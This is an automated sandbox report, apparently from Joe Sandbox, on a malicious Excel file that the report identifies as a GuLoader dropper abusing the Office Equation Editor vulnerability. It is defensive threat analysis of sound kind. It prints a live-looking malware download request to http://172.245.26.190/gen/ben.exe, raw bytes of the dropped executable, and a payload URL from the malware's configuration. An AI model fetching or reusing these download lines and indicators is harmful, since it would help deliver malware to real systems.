Windows Analysis Report new order no. Hc511 for sept.xlsx

Overview

General Information

Sample Name: new order no. Hc511 for sept.xlsx
Analysis ID: 482516
MD5: 10522a9c4f1f52b4fe31456e03133b43
SHA1: f78da793ab620c213e55e33ecdfe689f780eb910
SHA256: 342d93a58f17297d9de1ab5dbe0f23298f1cb7e2622d5816208ce5ef11579984
Tags: VelvetSweatshopxlsx
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for dropped file
Yara detected GuLoader
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Sigma detected: Execution from Suspicious Folder
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&i"}
Multi AV Scanner detection for submitted file
Source: new order no. Hc511 for sept.xlsx Virustotal: Detection: 30% Perma Link
Source: new order no. Hc511 for sept.xlsx ReversingLabs: Detection: 23%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe ReversingLabs: Detection: 15%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe Joe Sandbox ML: detected

Exploits:

barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Software Vulnerabilities:

barindex
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.26.190:80
Source: excel.exe Memory has grown: Private usage: 4MB later: 68MB

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&i
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 172.245.26.190 172.245.26.190
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 13 Sep 2021 18:58:54 GMTServer: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29Last-Modified: Mon, 13 Sep 2021 12:47:12 GMTETag: "20000-5cbdfdd2ef7af"Accept-Ranges: bytesContent-Length: 131072Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4f ad a0 db 0b cc ce 88 0b cc ce 88 0b cc ce 88 88 d0 c0 88 0a cc ce 88 44 ee c7 88 08 cc ce 88 3d ea c3 88 0a cc ce 88 52 69 63 68 0b cc ce 88 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 92 b3 c4 4a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 b0 01 00 00 50 00 00 00 00 00 00 74 15 00 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 04 00 04 00 00 00 00 00 00 00 00 10 02 00 00 10 00 00 e2 83 02 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 b7 01 00 28 00 00 00 00 e0 01 00 8b 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 30 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 ad 01 00 00 10 00 00 00 b0 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 10 19 00 00 00 c0 01 00 00 10 00 00 00 c0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 8b 29 00 00 00 e0 01 00 00 30 00 00 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gen/ben.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.26.190Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: unknown TCP traffic detected without corresponding DNS query: 172.245.26.190
Source: vbc.exe.4.dr String found in binary or memory: http://creativecommons.org/licenses/by-nc-sa/3.0/
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: 74DB69FF.emf.0.dr String found in binary or memory: http://www.day.com/dam/1.0
Source: vbc.exe, 00000006.00000002.713645090.0000000003297000.00000002.00020000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\74DB69FF.emf Jump to behavior
Source: global traffic HTTP traffic detected: GET /gen/ben.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.26.190Connection: Keep-Alive

System Summary:

barindex
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe Jump to dropped file
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 6_2_00401574 6_2_00401574
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7129 6_2_003C7129
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C3819 6_2_003C3819
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9C0D 6_2_003C9C0D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5C7D 6_2_003C5C7D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C646F 6_2_003C646F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C1846 6_2_003C1846
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C30B1 6_2_003C30B1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C4CA5 6_2_003C4CA5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C608F 6_2_003C608F
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C58FD 6_2_003C58FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C28FA 6_2_003C28FA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C18DD 6_2_003C18DD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C38CD 6_2_003C38CD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C28C3 6_2_003C28C3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5D27 6_2_003C5D27
Source: C:\Users\Public\vbc.exe Code function: 6_2_003CBD15 6_2_003CBD15
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C6505 6_2_003C6505
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C297D 6_2_003C297D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C6165 6_2_003C6165
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C4167 6_2_003C4167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5D61 6_2_003C5D61
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C55BD 6_2_003C55BD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C1995 6_2_003C1995
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7191 6_2_003C7191
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C95E4 6_2_003C95E4
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C61E5 6_2_003C61E5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C35E0 6_2_003C35E0
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C4DD8 6_2_003C4DD8
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5DD3 6_2_003C5DD3
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5637 6_2_003C5637
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C6E33 6_2_003C6E33
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5A27 6_2_003C5A27
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C1A21 6_2_003C1A21
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C2612 6_2_003C2612
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5E4D 6_2_003C5E4D
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C3647 6_2_003C3647
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C1AA9 6_2_003C1AA9
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5EA7 6_2_003C5EA7
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C36DA 6_2_003C36DA
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5ACD 6_2_003C5ACD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C62C1 6_2_003C62C1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C1B36 6_2_003C1B36
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C632B 6_2_003C632B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5B73 6_2_003C5B73
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5762 6_2_003C5762
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5F57 6_2_003C5F57
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C37A2 6_2_003C37A2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C339B 6_2_003C339B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C378B 6_2_003C378B
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5BFB 6_2_003C5BFB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C17F5 6_2_003C17F5
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C5FEE 6_2_003C5FEE
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C57E1 6_2_003C57E1
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9BDF 6_2_003C9BDF
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C63C5 6_2_003C63C5
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7129 NtAllocateVirtualMemory, 6_2_003C7129
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C7191 NtAllocateVirtualMemory, 6_2_003C7191
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C71FD NtAllocateVirtualMemory, 6_2_003C71FD
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C728D NtAllocateVirtualMemory, 6_2_003C728D
Abnormal high CPU Usage
Source: C:\Users\Public\vbc.exe Process Stats: CPU usage > 98%
PE file contains strange resources
Source: ben[1].exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: new order no. Hc511 for sept.xlsx Virustotal: Detection: 30%
Source: new order no. Hc511 for sept.xlsx ReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$new order no. Hc511 for sept.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR1F14.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.winXLSX@4/21@0/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: 00000006.00000002.711077349.00000000003C0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 6_2_00417B40 push dword ptr [edi+000000BCh]; ret 6_2_0041854C
Source: C:\Users\Public\vbc.exe Code function: 6_2_00405015 push esi; iretd 6_2_00405016
Source: C:\Users\Public\vbc.exe Code function: 6_2_00406435 push esi; retf 6_2_00406436
Source: C:\Users\Public\vbc.exe Code function: 6_2_004066C5 pushfd ; iretd 6_2_004066C7
Source: C:\Users\Public\vbc.exe Code function: 6_2_004038CD push esi; ret 6_2_004038D4
Source: C:\Users\Public\vbc.exe Code function: 6_2_0040394E push ds; iretd 6_2_0040397F
Source: C:\Users\Public\vbc.exe Code function: 6_2_00404F35 push esi; iretd 6_2_00404F36
Source: C:\Users\Public\vbc.exe Code function: 6_2_004043D0 pushfd ; retf 6_2_004043D2
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C3DBA push 38926977h; ret 6_2_003C3DC1
Source: initial sample Static PE information: section name: .text entropy: 7.1086042671
Source: initial sample Static PE information: section name: .text entropy: 7.1086042671

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ben[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1444 Thread sleep time: -120000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9F3C rdtsc 6_2_003C9F3C

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9F3C rdtsc 6_2_003C9F3C
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C6C03 mov eax, dword ptr fs:[00000030h] 6_2_003C6C03
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C4167 mov eax, dword ptr fs:[00000030h] 6_2_003C4167
Source: C:\Users\Public\vbc.exe Code function: 6_2_003C9282 mov eax, dword ptr fs:[00000030h] 6_2_003C9282

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.711380898.0000000000940000.00000002.00020000.sdmp Binary or memory string: Program Manager<
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 482516 Sample: new order no. Hc511 for sept.xlsx Startdate: 13/09/2021 Architecture: WINDOWS Score: 100 24 Found malware configuration 2->24 26 Multi AV Scanner detection for dropped file 2->26 28 Multi AV Scanner detection for submitted file 2->28 30 10 other signatures 2->30 6 EQNEDT32.EXE 12 2->6         started        11 EXCEL.EXE 34 40 2->11         started        process3 dnsIp4 22 172.245.26.190, 49167, 80 AS-COLOCROSSINGUS United States 6->22 16 C:\Users\user\AppData\Local\...\ben[1].exe, PE32 6->16 dropped 18 C:\Users\Public\vbc.exe, PE32 6->18 dropped 32 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 6->32 13 vbc.exe 6->13         started        20 C:\...\~$new order no. Hc511 for sept.xlsx, data 11->20 dropped file5 signatures6 process7 signatures8 34 Multi AV Scanner detection for dropped file 13->34 36 Machine Learning detection for dropped file 13->36
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
172.245.26.190
 unknown United States
36352 AS-COLOCROSSINGUS true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://172.245.26.190/gen/ben.exe true
  • Avira URL Cloud: safe
 unknown